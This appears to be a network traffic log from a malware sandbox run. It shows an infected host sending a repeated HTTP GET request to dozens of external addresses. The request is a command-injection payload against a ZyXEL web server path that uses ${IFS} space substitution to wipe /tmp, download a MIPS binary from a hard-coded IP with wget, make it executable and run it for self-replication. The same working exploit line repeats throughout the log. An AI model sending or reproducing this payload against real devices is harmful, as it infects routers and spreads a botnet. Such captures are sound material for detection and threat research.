                                    Jan 13, 2024 19:02:36.223268032 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4865192.168.2.135699065.51.244.248443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:36.223331928 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4866192.168.2.1341120136.205.107.205443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:36.223381996 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4867192.168.2.1358558109.72.229.39443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:36.223436117 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4868192.168.2.1346496187.70.183.90443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:36.223501921 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4869192.168.2.134141823.200.217.221443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:36.223546028 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4870192.168.2.134453812.175.221.34443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:36.223598003 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4871192.168.2.136073820.31.56.102443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:36.223649025 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4872192.168.2.134293297.139.66.115443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:36.223727942 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4873192.168.2.13580709.205.137.150443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:36.223789930 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4874192.168.2.1337250162.169.178.5443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:36.223901033 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4875192.168.2.134230892.93.75.153443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:36.223985910 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4876192.168.2.1337040117.187.203.220443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:36.224036932 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4877192.168.2.1353214151.159.104.205443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:36.224075079 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4878192.168.2.136092412.125.17.116443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:36.224169970 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4879192.168.2.1345106147.149.97.166443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:36.224255085 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4880192.168.2.134979238.89.23.175443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:36.224303007 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4881192.168.2.135169812.162.115.160443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:36.224371910 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4882192.168.2.135603266.214.164.127443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:36.224431992 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4883192.168.2.1358538223.58.148.152443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:36.224488020 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4884192.168.2.1350972164.143.101.158443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:36.224541903 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4885192.168.2.1352594116.117.214.239443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:36.224584103 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4886192.168.2.135391496.105.56.160443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:36.224643946 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4887192.168.2.1343654196.153.124.87443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:36.224709988 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4888192.168.2.134987424.1.109.215443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:36.224756002 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4889192.168.2.13371368.223.125.48443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:36.224824905 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4890192.168.2.134060659.156.234.211443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:36.224875927 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4891192.168.2.13359205.194.136.104443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:36.224936962 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4892192.168.2.1356822165.30.114.2443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:36.225003004 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4893192.168.2.1354528189.82.91.18443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:36.225183010 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4894192.168.2.1348672157.70.77.4443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:36.225209951 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4895192.168.2.135335678.141.94.113443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:36.225245953 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4896192.168.2.1351168194.232.68.22443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:36.225311041 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4897192.168.2.1341096139.192.90.237443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:36.225351095 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4898192.168.2.1351402191.27.62.230443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:36.225418091 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4899192.168.2.1342850188.114.27.11443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:36.225476027 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4900192.168.2.136052882.104.128.165443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:36.225534916 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4901192.168.2.1345232203.53.240.176443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:36.225565910 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4902192.168.2.1346816108.244.10.14443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:36.225632906 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4903192.168.2.1333154119.9.249.57443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:36.225711107 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4904192.168.2.1334812208.244.107.169443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:36.225780964 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4905192.168.2.1349746173.225.245.46443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:36.225841999 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4906192.168.2.135969858.59.49.24443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:36.225917101 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4907192.168.2.135707464.111.35.115443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:36.226022005 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4908192.168.2.133860638.152.206.225443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:36.226079941 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4909192.168.2.1343230182.158.44.241443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:36.226133108 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4910192.168.2.1360958212.32.61.16443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:36.226219893 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4911192.168.2.135333824.180.47.143443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:36.226263046 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4912192.168.2.134400853.157.144.214443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:36.226309061 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4913192.168.2.1348992185.35.136.36443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:36.226355076 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4914192.168.2.1343176151.77.83.200443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:36.226408958 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4915192.168.2.135667871.67.62.213443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:36.226475954 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4916192.168.2.1345322121.190.231.221443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:36.226535082 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4917192.168.2.134300640.36.179.59443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:36.226603985 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4918192.168.2.1335326119.205.62.7443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:36.226665974 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4919192.168.2.135675844.52.229.58443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:36.226715088 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4920192.168.2.135509072.239.165.121443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:36.226783991 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4921192.168.2.1352558134.166.154.92443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:36.226844072 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4922192.168.2.1350040107.187.102.140443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:36.226906061 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4923192.168.2.1336716185.53.86.39443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:36.226965904 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4924192.168.2.135393053.219.11.28443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:36.227045059 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4925192.168.2.1348272182.130.160.209443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:36.227118969 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4926192.168.2.1345580146.147.30.83443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:36.227207899 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4927192.168.2.134663061.204.83.58443
                                    TimestampBytes transferredDirectionData
